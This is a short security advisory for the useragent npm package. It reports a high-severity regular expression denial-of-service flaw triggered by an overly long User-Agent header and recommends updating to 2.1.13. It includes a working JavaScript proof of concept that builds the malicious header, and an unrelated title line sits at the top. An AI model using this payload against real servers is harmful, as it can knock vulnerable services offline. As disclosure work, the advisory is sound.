Necromancers Playing MTG
Severity: high

ReDoS via long UserAgent header

useragent

Overview

Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.

Proof of Concept

var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));

Remediation

Update to version 2.1.13 or later.

Advisory timeline

  1. published

    Advisory published
    Apr 14th, 2017
  2. reported

    Feb 9th, 2017